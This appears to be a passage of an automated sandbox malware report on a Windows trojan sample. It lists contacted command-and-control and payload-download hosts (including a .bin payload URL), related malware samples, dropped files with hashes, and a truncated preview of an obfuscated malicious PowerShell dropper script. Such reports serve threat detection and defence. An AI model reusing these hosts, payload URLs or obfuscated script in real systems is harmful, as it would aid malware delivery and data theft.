http://www.carhireheaven.online/rym4/?uVKlz=ndVa/RILK9FLDRpgtoZJ+J8IBXYKH57ZDy7Pf7hM0FMVC1dzhL8viYhuuez44cZISqlmpTXSVNjrzOBKappePk6RQICM+G+QyTBiA70rdrzzN+VPX4YC9zgU1gXoNV1ZFV83DTE=&RPITK=DxtTE6	0%	Avira URL Cloud	safe
http://212.162.149.66/KtFSlX90.bin	100%	Avira URL Cloud	malware
http://www.dy01urj.pro	0%	Avira URL Cloud	safe
http://www.dy01urj.pro/f425/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
carhireheaven.online	165.22.38.185	true	true	unknown
www.dy01urj.pro	154.88.22.104	true	true	unknown
www.carhireheaven.online	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.dy01urj.pro/f425/	true	Avira URL Cloud: safe	unknown
http://www.carhireheaven.online/rym4/?uVKlz=ndVa/RILK9FLDRpgtoZJ+J8IBXYKH57ZDy7Pf7hM0FMVC1dzhL8viYhuuez44cZISqlmpTXSVNjrzOBKappePk6RQICM+G+QyTBiA70rdrzzN+VPX4YC9zgU1gXoNV1ZFV83DTE=&RPITK=DxtTE6	true	Avira URL Cloud: safe	unknown
http://212.162.149.66/KtFSlX90.bin	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.ftp.ftp://ftp.gopher.	Opfattelsers.exe, 00000006.00000001.2794074840.0000000000649000.00000020.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	Forhandlingsfriheden.exe, Opfattelsers.exe.2.dr	false		high
https://www.ecosia.org/newtab/	svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ion=v4.5sPu7	powershell.exe, 00000002.00000002.2799477621.0000000006E0B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.m	powershell.exe, 00000002.00000002.2802643987.0000000007E83000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	Opfattelsers.exe, 00000006.00000001.2794074840.00000000005F2000.00000020.00000001.01000000.00000008.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.2795610607.00000000046E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmp	false		high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	Opfattelsers.exe, 00000006.00000001.2794074840.0000000000649000.00000020.00000001.01000000.00000008.sdmp	false		high
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	Opfattelsers.exe, 00000006.00000001.2794074840.00000000005F2000.00000020.00000001.01000000.00000008.sdmp	false		high
http://212.162.149.66/KtFSlX90.bin&	Opfattelsers.exe, 00000006.00000002.3039764364.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://212.162.149.66/KtFSlX90.bin%	Opfattelsers.exe, 00000006.00000002.3039764364.0000000003B2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dy01urj.pro	PxuyeSuijNdsM.exe, 00000008.00000002.3367185482.0000000008CCA000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://212.162.149.66/KtFSlX90.binsd	Opfattelsers.exe, 00000006.00000002.3039764364.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2795610607.00000000046E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmp	false		high
http://212.162.149.66/	Opfattelsers.exe, 00000006.00000003.2935042588.0000000003B3A000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000002.3039878471.0000000003B3C000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2935165232.0000000003B3A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
165.22.38.185	carhireheaven.online	United States	14061	DIGITALOCEAN-ASNUS	true
154.88.22.104	www.dy01urj.pro	Seychelles	40065	CNSERVERSUS	true
212.162.149.66	unknown	Netherlands	64236	UNREAL-SERVERSUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572359
Start date and time:	2024-12-10 13:51:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Forhandlingsfriheden.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/14@2/3
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 86% Number of executed functions: 133 Number of non-executed functions: 314
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 5336 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Forhandlingsfriheden.exe

Simulations

Behavior and APIs

Time	Type	Description
07:51:54	API Interceptor	37x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
165.22.38.185	Salmebogs(1).exe	Get hash	malicious	FormBook, GuLoader	Browse
154.88.22.104	Need Price Order No.17084 PARLOK.exe	Get hash	malicious	FormBook	Browse	www.dy01urj.pro/82h3/
154.88.22.104	Salmebogs(1).exe	Get hash	malicious	FormBook, GuLoader	Browse	www.dy01urj.pro/f425/
212.162.149.66	purchase order.exe	Get hash	malicious	FormBook, GuLoader	Browse	212.162.149.66/NmxYyszZoKwuD57.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.dy01urj.pro	Need Price Order No.17084 PARLOK.exe	Get hash	malicious	FormBook	Browse	154.88.22.104
www.dy01urj.pro	Salmebogs(1).exe	Get hash	malicious	FormBook, GuLoader	Browse	154.88.22.104

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNSERVERSUS	rebirth.arm.elf	Get hash	malicious	Mirai, Okiru	Browse	43.243.183.82
	Need Price Order No.17084 PARLOK.exe	Get hash	malicious	FormBook	Browse	154.88.22.104
	DRAFT COPY BL, CI & PL.exe	Get hash	malicious	FormBook	Browse	154.90.58.209
	Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe	Get hash	malicious	FormBook	Browse	172.247.112.164
	jew.arm6.elf	Get hash	malicious	Unknown	Browse	23.225.125.46
	SRT68.exe	Get hash	malicious	FormBook	Browse	154.88.22.105
	UPDATED CONTRACT.exe	Get hash	malicious	FormBook	Browse	23.225.159.42
	ex86.elf	Get hash	malicious	Mirai	Browse	156.251.245.99
	PO 4110007694.exe	Get hash	malicious	FormBook	Browse	154.88.22.101
	Latest advice payment.exe	Get hash	malicious	FormBook	Browse	154.88.22.101
DIGITALOCEAN-ASNUS	http://email.edms.trackingmore.com/c/eJx0zrFuhDAMgOGnCWPE2YHAkKELr4FsxwF05EBJWun69JU6den8D_8XQz88mKXT8PCICDi6udsDJB44oUuePHiZGCABe0UvMAlP3RGGSSHOI4w--d7NiUdBAlQPKglkNq7Pb9sKyfN4bfkqauXK3Rn21m6DHwYWA0usZKlGu50X03lT2-tOJ1mNn_Z1G1hK7PJ7zVorbboe8Y9z_T7kWS7W0tD1xvVbpuP8vZTwf_sK8BMAAP__3p9Nvw#4UjjVf19156dXgi477henjyiztuh1607QELNKWKBNFUHFFI32RLCJ32096s9/84502vqz	Get hash	malicious	Phisher	Browse	159.65.226.43
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	188.166.27.224
	la.bot.sparc.elf	Get hash	malicious	Mirai	Browse	138.68.122.102
	lz3EbiqoK4.exe	Get hash	malicious	Quasar	Browse	167.71.56.116
	lz3EbiqoK4.exe	Get hash	malicious	Quasar	Browse	167.71.56.116
	deeffrot.doc	Get hash	malicious	Unknown	Browse	165.227.215.208
	https://sendgb.com/vdRYC6Nal34?utm_medium=HlyZfLISdD8Bj1i	Get hash	malicious	Unknown	Browse	185.14.184.154
	xxx.doc	Get hash	malicious	Unknown	Browse	165.227.215.208
	Potvrda_o_uplati.docx.doc	Get hash	malicious	Unknown	Browse	165.227.215.208
	RUCkZvoDjG.htm	Get hash	malicious	WinSearchAbuse	Browse	68.183.112.81
UNREAL-SERVERSUS	PO. A-72 9234567.exe	Get hash	malicious	FormBook, GuLoader	Browse	212.162.149.89
	la.bot.arm7.elf	Get hash	malicious	Mirai	Browse	162.251.123.175
	file.exe	Get hash	malicious	RedLine	Browse	212.162.149.48
	https://haqzt.trc20.kcgrocks.com/merchantServices	Get hash	malicious	Unknown	Browse	172.96.10.214
	scan_241205-801_draft_PO.exe	Get hash	malicious	Remcos, GuLoader	Browse	162.251.122.87
	1g4lfpPUqt.exe	Get hash	malicious	GuLoader	Browse	212.162.149.63
	purchase order.exe	Get hash	malicious	FormBook, GuLoader	Browse	212.162.149.66
	Juleferien.exe	Get hash	malicious	FormBook	Browse	212.162.149.128
	Juleferien.exe	Get hash	malicious	FormBook	Browse	212.162.149.128
	RFQ-24-10104-PO X241104754-007.exe	Get hash	malicious	Remcos	Browse	162.251.122.86

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\72945936

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bidragspligtige132\vaklende.sna

Process:	C:\Users\user\Desktop\Forhandlingsfriheden.exe
File Type:	data
Category:	dropped
Size (bytes):	340924
Entropy (8bit):	1.2553271369192232
Encrypted:	false
SSDEEP:	768:rmUSNMYYmaSwBaGhKmULRAGcnjPDQ5lHJ30U5MFvsAkhuD7odAmLVBeOdlfHV22E:vvCsDuqEZ11vtew5dzv9
MD5:	C41E860BAAE2CC8168C2ABD50BB5BDF4
SHA1:	548575B164EDA9485A2B3F66161C8024619B6423
SHA-256:	601CF3825DCDD9076ED0A3CB778F62AF942CF20D64D3F86335A57B43E29F2B52
SHA-512:	9D2D97A7CAE52202807093ABF8BF4DE3F01BF54BAFF02C8110D800A7E6B1F6290B3ED60FB954809F9231BEDF730CA7244E9E51EE6B6074445DB180EB0E956718
Malicious:	false
Preview:	......................j..h....!..............................................p.............c....P............................k......................................y...............o`....................}...'9...........................Gt......................P.............................................................'.................................#.......................!.............................................................................................W.....C..........................................................................U...g......................................H.....s............n........U........)..........................................s.........S.................t......................................M.................................................................................S.............................................................H........................).............c.$...... .....................n.....................................

C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\Tvrvejen179.Maa

Process:	C:\Users\user\Desktop\Forhandlingsfriheden.exe
File Type:	data
Category:	dropped
Size (bytes):	343664
Entropy (8bit):	7.533339783060515
Encrypted:	false
SSDEEP:	6144:0cYC0nYlwsin3/ZvpihJ3SYB4LpIuNfGaLuiSN+t8ZzgDq9/ldYRCXx1W8UHR9CX:/YC0nYlwsiQSC4Lu2uiS2AiRCXJgpc5v
MD5:	41325030CD022F8F0BCE765DACBACD27
SHA1:	27B44327536D1F4A60B07ACE2A105703A10F0C90
SHA-256:	4276231B1A4A5DCEB5907FEE8C5A274FF07FCADB310CCA4D3D4E64AC640F5322
SHA-512:	90F459BD0CECA6DEC84C63B6C30D1B78758F84E39E36FAA8712665F8AD79A851BBFECE2D689494FD06185F4686D8AADBD6DC06ED3279E8A58157E8685193EB76
Malicious:	false
Preview:	..aaaaa.(.O............Q.......................~~~.....t.``............---...............\.O...........jj..........................J.......................................W..........ss........J...........ll.......v.r............Z....=...9...;.OO....B............................A......\......................?.....H.....r...."....\|.........Z......................F.....X.....................................UU..BB.x..k.__................4444.e..;..))..xxx....+...........^.....ee.........L.u........................................@@@................X....<..............................rr..5.......................g.................)))......W.......ii..;........R....{{{{...XXX.........++........................MMM..............BBBB..s.............MM......???.......................;........22.xx........0.......................}..Z......................................tt.WW....eee..........................bb...............................a..................ss....qqq.....33.ee.............+.bb...

C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\acology.mar

Process:	C:\Users\user\Desktop\Forhandlingsfriheden.exe
File Type:	data
Category:	dropped
Size (bytes):	437071
Entropy (8bit):	1.253825384833456
Encrypted:	false
SSDEEP:	768:uWsvcxI4BCLNVp0kyRWlxp4pkE5sS+ZA4o7VengmxKgoMqbGam2C1afEUe/u41Az:2T4BC0SG4J+VB8GA2pzEszrq2GrwLnj
MD5:	F030199A57CDBFC5D06AC8BFB59059C3
SHA1:	3C7AA5EA48CBAA34C8426B76498CD4BF5BF644BF
SHA-256:	FD1253B138D560D3AD0A56C32F37D0FDBDE9E16CC37E59E991595C7349B1F087
SHA-512:	7EC5E2553A15923396B77E07685172CEEAFDE8F60CCBB97E0796DCB8E1BBA8FF17F1CA242B143AD497942FDC8D7473AEFB5091E6492616B3D8C0EBCBA13C98C2
Malicious:	false
Preview:	.....................................X....................................>..a......................A......w..............................@.y........K..............................................z...................z...........p............V.....................................................h....................\|..U.........../................................................................O..+.............................................+................F....................................2......................J..........................".........................A.............................-..............G..............S...............V.............t.......=.....................b.............................................................................................................................................................w................3........f.................2.........................m.0.........................................q...............................

C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\bambusmbler.gud

Process:	C:\Users\user\Desktop\Forhandlingsfriheden.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4095), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	75355
Entropy (8bit):	5.122102914816226
Encrypted:	false
SSDEEP:	1536:1IUx2OzvrZQvT1wLKHp/z0GgK3unpu6IN9Dw7fOMLukpGoz4eg:1xzvlQr+WJ/z0GH3Wu6IN9fMLuexU
MD5:	CD980C6711B089FE9C1D4D13BAEC70C9
SHA1:	927E38F5C33BFC320AE78C2F893B30D208C2153C
SHA-256:	29E7FF5F03CCF993A459B938C2FB5AA267D8CE5B33A7CC78BCDA9AEADAB1BE6A
SHA-512:	898D775E30DD974F7E60879E375A0802558D9A867749C21B85A520E7001FB0B1F368379F095D087A72B9D1C467A319CD848CD1D128A06FE2B409E1A3512DB81B
Malicious:	true
Preview:	$Trudi=$ginsberg;........$Foreboard = @'.For rom. Hyoth,$Jawyc.dCForb,deh BegginaDisordeiBronch nAchatinoGaflensnVirkn,n= Sparta$ FiskesF Sab atrOd rantaVestkysfOverv jr Ptyalot RadioseG asbls;Commerc. epkyllf OrddeluBlaaklonMiszea cSortk dtBackingidetenteoBrachydnP,eferr LunersbL Linkedosprut lpPiquetbpfilm dkiBuckto,eEpopoeis ThickltSquadro Udlaane(Washupt$TinksmeUSoldyrkn Co kshaFigen acslagelzc BallasePoohsgesPowde es Subseni owelsbbKran jlldevolute SkeblanSmag sae SporotsFro tess studenaKlem inv Equicoelogaoedn AnalytiConsolatThrottle pseudo1Propiti4 adikal6.verhel,styring$KeepingKTariflnr TekstiaMu,quasfKopierit nyderti Desulfg Unthr,eMoringu)Femli g Testifi{Mervrdi.Ibenhol. Os.ren$LococinSmagnolimPhotocooAkkoladoBlokfuncAbidersh KitinssSubo aq Den,es(SkrdderC O isaca,stemndc UniveroU selfnz WincereOmslagsaGalgernlOmprioroUnder iuDorosacs Kln.di Abersfu'LavetstK Stone,l HayeteiKnobblypcirusesn Imm teiHjern snA vokat$BuckeroCHanefiyr CoarseeSkibsstnPerverteBakisumlS.gnsovsSrbeha

C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Facultate\straffesager.tra

Process:	C:\Users\user\Desktop\Forhandlingsfriheden.exe
File Type:	data
Category:	dropped
Size (bytes):	484281
Entropy (8bit):	1.2585657408825282
Encrypted:	false
SSDEEP:	1536:ZtZbLcPMi2av+CVKljwe/ieUZ39FbMXVvL:PyPrdCBlotFbO
MD5:	A8740E0A6C72618AB3FB8804F4835BEF
SHA1:	6393CB3D9E3E670BA5C96F4A757F5B198196EB15
SHA-256:	EF5DB6A0097473B03CCF2A1E6152E2AC7AC57BB31B31A06529BCD3900E9C097C
SHA-512:	55740B7FE5A3D26FC47F9695B2FD33C045E67E6E36F0D2121235C2AEA9800F19740C1B0F797E32E8108E10245D8A4616308173E24A61129D82B9D60500C8763C
Malicious:	false
Preview:	.............................................................................[....2...........W......A.................S........y.................................................................4.......D...=...............Y......................".............................................................7............................................................................Y.....................................{........{.....>................m.....................................`...................................r...............................?.....#...............8.?.....................................................-..........\....................................................%:.................................p.................{.......r.............u..m...b...........................<.........................................................................1...............................................S.............................................4.............W....

C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Facultate\tallness.ber

Process:	C:\Users\user\Desktop\Forhandlingsfriheden.exe
File Type:	data
Category:	dropped
Size (bytes):	493903
Entropy (8bit):	1.2514017425028907
Encrypted:	false
SSDEEP:	1536:J5fAgVg2t2pObnNoCYrlANC4fcmCuJyzbffMxL+hJfryobV3Krqx1TJG:r/Bb+CYr2cbPiihhqUO
MD5:	8B4C2BBEDD252D6BB6DB679AB3723802
SHA1:	2D9775744675D3B32F3CA2FDF975C9293B719926
SHA-256:	9CCADD82A127BA29D7BA291CB307753D060CA26A3C3CCBCB9EDB3F3A38E5EE31
SHA-512:	7940E4CE5AB08DDFE4DB8B2676F9B92C51DC794C8772760C279B8BC57B7C97502ADBF91747D4FA57BAA6B5B695504E090875DF6890D478B8FD6CF8D70B3C8F65
Malicious:	false
Preview:	..Zy..........................................V......................k...................g........./.............Q.........l..#.....^............................................x..........&.............................../................................................................./............/.........................).......?......................p.............o..........................................sy............................................................5.........................R2...................................................................................................."e..............................................Y..................................................l.......{................s...............................................9..........................d.........&.......r......................<..........................................................................................................?............*..................L.................

C:\Users\user\AppData\Local\Temp\Opfattelsers.exe

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	801513
Entropy (8bit):	7.828311562814192
Encrypted:	false
SSDEEP:	12288:UXqlVfD6qDmRHs0I5FcOM0hHaYLVC61UrV4PRklT3we+doWVkeehow:UXqzrTDmBsRkLYLV24QT31V1how
MD5:	B149B18BE3FEC4CF93173C200384222C
SHA1:	F9E248A8612781C407537750D4CDD515798EDC34
SHA-256:	A1F2A8771D4075B694648EBB4CDD11BB2DB213A947F8D08D6DCA7A8710F651D7
SHA-512:	6DEC95032B50C615F05855F011AF726C35008AA259911E45D73E817102CE5E13C1F202FB80FA703E564C96822B13BD696D4B0CC5FF5F07DDDC1E0E11BA92BAAE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".......5............@.......................................@..........................................................................................................................................................text...ve.......f.................. ..`.rdata..X............j..............@..@.data...8............~..............@....ndata...0...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Opfattelsers.exe:Zone.Identifier

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d4efnxfl.sk4.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ephewmfj.qcp.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iz1lj5wb.5tc.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufdiq13g.y0d.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
